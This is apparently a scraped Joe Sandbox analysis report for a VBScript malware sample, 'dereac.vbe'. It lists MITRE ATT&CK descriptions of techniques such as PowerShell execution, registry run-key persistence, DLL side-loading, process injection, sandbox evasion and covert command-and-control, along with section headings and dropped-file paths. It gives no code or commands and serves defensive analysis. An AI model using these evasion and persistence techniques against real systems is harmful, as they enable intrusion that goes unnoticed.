Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report dereac.vbe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

Spreading

System Summary

Data Obfuscation

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Name.vbs

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3qx4gdqf.o3h.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hzmsrrn5.j1g.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ncrvk415.1ci.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sa0kiksk.2zz.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t1exgplu.wpu.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_txcdfupu.bmd.ps1

Static File Info

General

File Icon

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Windows Analysis Report
dereac.vbe